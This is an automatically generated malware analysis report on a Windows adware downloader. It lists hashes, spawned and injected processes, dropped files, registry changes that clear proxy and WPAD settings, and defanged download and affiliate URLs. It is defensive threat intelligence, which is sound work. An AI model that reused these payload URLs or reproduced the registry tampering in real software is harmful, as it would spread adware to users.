Application.Downloader.RO_325175aa97
not-a-virus:AdWare.Win32.AdLoad.wvar (Kaspersky), Application.Downloader.RO (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 325175aa976eef22d0cc911fbcfdef64
SHA1: 9ed52ce5a43dc37a4ffd38d410301f4766774b90
SHA256: bf5cf82787dc628f22f7ab2cd8a01573e1c9e56d18bd7a46295a3787da05ba50
SSDeep: 12288:BK2mhAMJ/cPlJHiqQF2qTuxS7R38JK8l924IqPKZ5SRWocW:w2O/GlJHQ1lR38Jpl9XIqYIWDW
Size: 582736 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Hul
Created at: 2012-06-09 16:19:49
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884
The Application injects its code into the following process(es):
Setup__2140_il2.exe:3512
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Setup__2140_il2.exe:2308 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
The process Setup__2140_il2.exe:3512 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
The process sevensetup.exe:3356 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
The Application deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd584D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (0 bytes)
The process %original file name%.exe:3580 makes changes in the file system.
The Application creates and/or writes to the following file(s):
The Application deletes the following file(s):
The process cpSetup.exe:3976 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
The process run-setup.exe:3884 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)
The Application deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC40.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp (0 bytes)
Registry activity
The process Setup__2140_il2.exe:2308 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\noesis.beryline]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"
[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following registry key(s):
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
[HKCR\noesis.beryline\CurVer]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
[HKCR\noesis.beryline.1\CLSID]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Programmable]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
[HKCR\noesis.beryline]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
[HKCR\noesis.beryline.1]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process Setup__2140_il2.exe:3512 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\noesis.beryline]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3B 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"
[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process sevensetup.exe:3356 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3580 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process cpSetup.exe:3976 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479002472"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process 5827498a25abb_ua.exe:2980 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
The process run-setup.exe:3884 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe,"
Dropped PE files
| MD5 | File path |
|---|---|
| a7318ed2c34bd30f5605e0457734826f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe |
| a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll |
| aa91653a46d59ef020669de66aa1fb31 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
| .rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
| .data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
| .CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
| .rsrc | 192512 | 16656 | 16896 | 3.23905 | aa3a7d7ff24a928d00c7a73daacad998 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 567
01d8f21bdcf3f33cfd44b21cda45bbe1
c9ab4e6c1cfc8ff69ab509756fb4bbb2
a93831bd552da93e3bc3af481883f0cb
8512a38a32d856c43d3d53d1298cdf48
27a2aefa7a8141c7e4d47e4e4e4912dd
62535b8e1ac59d327110d422df7027bc
79f46ad15df03ce32082a5b77e5e8484
19154cb115d8d2adce3b82459253bbb3
1ad22ffca5f98db241175ce6612e1c6c
77653dae69494148cf58389a89a9bd40
9663e05c1cb81a47db70ac43ebb824e1
5e2e21eb1cccabe74a231dc8ee7e45ab
a08d1145184718c8cfb3e674cb51bf37
7ec5648ba6020db188003cab70553f79
b1220d6c3e4fc06ac894d65353fb84e6
b0516e031ff5e44241d3bd16b28983d8
64989f7c46d4103fa833fe61c529a1bf
62379b050ee5ee24b5710d77976e4a4c
e47b3680df663a409ff27e7892659d6a
5094e2b5502bb3eb161183ccdd26bee5
d8616b984b03d23f2ddad2ace1e6fcc9
bb3461f9ff7218951e59c6c7d5e18f65
f6794b812107e8db90b8a9adbc3a19d6
babe8174d9e14bddc4572ed8fc3fef02
0c153ff4df276bb5694854186f48e695
URLs
| URL | IP |
|---|---|
| hxxp://52.222.174.245/get.php?ses=429155916441231936 | |
| hxxp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
| hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
| hxxp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
| hxxp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | |
| hxxp://d2adi7hu49xk5t.cloudfront.net/appImg.jpg | |
| hxxp://d2adi7hu49xk5t.cloudfront.net/normal_bg.jpg | |
